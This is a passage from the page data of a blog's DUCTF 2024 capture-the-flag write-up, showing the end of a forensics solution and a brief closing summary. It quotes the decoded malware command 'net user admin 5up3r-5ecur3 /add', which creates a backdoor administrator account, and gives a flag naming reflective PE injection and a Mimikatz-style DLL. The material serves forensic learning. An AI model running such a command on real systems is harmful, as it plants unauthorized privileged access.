style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Analyzing this in CyberChef shows that it executes <code class=\"language-text\">net user admin 5up3r-5ecur3 /add</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/009b5c41c897432f60eff3d580e5faf3/06868/image-20240712001107359.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 19.583333333333332%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAwUlEQVQY022ObW+DMAyE+f9/bpo0lVa0o6MwUUhLEyeQN7g6kfaJWXp0d7ZsuehEg6cRzIjX/MCoBwjd43q/oBtaKFJQWoE0QSqZszaaVXJPwcwm99JMPASKavxGK69oVY2ebjgMJfOBo/jEnToEHxFC2OG932VrLYqy/0L9OuFHVqinE3NEI89Mhd9nAyX5I61hjMkQf7MsC5xzWdOR5IkI0zShoFnCrw4uWvjoMsm7yEvBYl1XxBiz/vlt2/4l1RughDMfxHhJrQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/009b5c41c897432f60eff3d580e5faf3/8ac56/image-20240712001107359.webp 240w,\n/static/009b5c41c897432f60eff3d580e5faf3/d3be9/image-20240712001107359.webp 480w,\n/static/009b5c41c897432f60eff3d580e5faf3/e46b2/image-20240712001107359.webp 960w,\n/static/009b5c41c897432f60eff3d580e5faf3/f992d/image-20240712001107359.webp 1440w,\n/static/009b5c41c897432f60eff3d580e5faf3/882b9/image-20240712001107359.webp 1920w,\n/static/009b5c41c897432f60eff3d580e5faf3/b805e/image-20240712001107359.webp 1974w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/009b5c41c897432f60eff3d580e5faf3/8ff5a/image-20240712001107359.png 240w,\n/static/009b5c41c897432f60eff3d580e5faf3/e85cb/image-20240712001107359.png 480w,\n/static/009b5c41c897432f60eff3d580e5faf3/d9199/image-20240712001107359.png 960w,\n/static/009b5c41c897432f60eff3d580e5faf3/07a9c/image-20240712001107359.png 1440w,\n/static/009b5c41c897432f60eff3d580e5faf3/29114/image-20240712001107359.png 1920w,\n/static/009b5c41c897432f60eff3d580e5faf3/06868/image-20240712001107359.png 1974w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/009b5c41c897432f60eff3d580e5faf3/d9199/image-20240712001107359.png\"\n            alt=\"image-20240712001107359\"\n            title=\"image-20240712001107359\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The final correct flag was <code class=\"language-text\">DUCTF{monkey.doc.ps1_invoke-reflectivepeinjection_emu.dll-kiwi.dll_5up3r-5ecur3}</code>.</p>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>I spent too much time on easy problems, so I want to get better at solving them quickly as well.</p>","fields":{"slug":"/ctf-ductf-2024-en","tagSlugs":["/tag/rev-en/","/tag/pwn-en/","/tag/forensic-en/","/tag/english/"]},"frontmatter":{"date":"2024-07-12","description":"DUCTF 2024 Writeup","tags":["Rev (en)","Pwn (en)","Forensic (en)","English"],"title":"DUCTF 2024 Writeup","socialImage":{"publicURL":"/static/c079c6637f6618a3beb6fab238cf69cc/ctf-ductf-2024.png"}}}},"pageContext":{"slug":"/ctf-ductf-2024-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}